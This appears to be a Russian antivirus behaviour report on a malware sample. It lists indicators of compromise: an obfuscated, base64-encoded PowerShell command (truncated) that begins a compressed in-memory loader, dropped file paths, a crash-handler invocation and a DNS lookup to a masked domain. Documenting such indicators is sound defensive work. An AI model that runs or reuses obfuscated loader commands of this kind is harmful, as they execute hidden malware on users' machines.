Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBt...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1968
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %TEMP%\967065.cvr
- DNS ASK vr###64uo.com